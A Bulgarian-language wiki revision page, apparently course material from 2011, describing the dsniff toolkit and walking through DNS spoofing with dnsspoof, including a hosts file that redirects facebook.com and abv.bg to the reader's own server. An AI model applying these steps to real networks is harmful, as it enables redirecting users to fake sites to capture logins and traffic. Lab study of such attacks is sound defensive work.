Difference between revisions of "Spoofing"
| Line 35: | Line 35: | ||
== dnsspoof == | == dnsspoof == | ||
| − | 1.Създаване на файл с хостовете, които искаме да фалшифицираме. Заменете в примерния файл IP адресите с адреса на вашия web server, a имената на домейни с домейните, които искаме да фалшифицираме. | + | 1. Създаване на файл с хостовете, които искаме да фалшифицираме. Заменете в примерния файл IP адресите с адреса на вашия web server, a имената на домейни с домейните, които искаме да фалшифицираме. |
Създаване на файл. | Създаване на файл. | ||
| − | nano host.new | + | ~$nano host.new |
Примерно съдържание. | Примерно съдържание. | ||
172.16.16.165 *.facebook.com | 172.16.16.165 *.facebook.com | ||
172.16.16.165 *.abv.bg | 172.16.16.165 *.abv.bg | ||
| + | |||
| + | 2. Стартиране на програмата, като администратор | ||
| + | |||
| + | ~$sudo dnsspoof -f host.new | ||
| + | |||
| + | |||
| + | След стартиране програмата слуша за dns запитвания. | ||
Revision as of 13:56, 13 October 2011
dsniff
dsniff Включва различни инструменти даващи възможност за "компрометиране на мрежата"
Включени инструменти:
- arpspoof - Send out unrequested (and possibly forged) arp replies.
- dnsspoof - forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
- dsniff - password sniffer for several protocols.
filesnarf - saves selected files sniffed from NFS traffic.
macof - flood the local network with random MAC addresses.
mailsnarf - sniffs mail on the LAN and stores it in mbox format.
msgsnarf - record selected messages from different Instant Messengers.
sshmitm - SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
sshow - SSH traffic analyser.
tcpkill - kills specified in-progress TCP connections.
tcpnice - slow down specified TCP connections via "active" traffic shaping.
urlsnarf - output selected URLs sniffed from HTTP traffic in CLF.
webmitm - HTTP / HTTPS monkey-in-the-middle. transparently proxies.
webspy - sends URLs sniffed from a client to your local browser (requires libx11-6 installed).
Инсталация в Убунту:
~$ sudo apt-get install dsniff
dnsspoof
1. Създаване на файл с хостовете, които искаме да фалшифицираме. Заменете в примерния файл IP адресите с адреса на вашия web server, a имената на домейни с домейните, които искаме да фалшифицираме.
Създаване на файл.
~$nano host.new
Примерно съдържание.
172.16.16.165 *.facebook.com 172.16.16.165 *.abv.bg
2. Стартиране на програмата, като администратор
~$sudo dnsspoof -f host.new
След стартиране програмата слуша за dns запитвания.
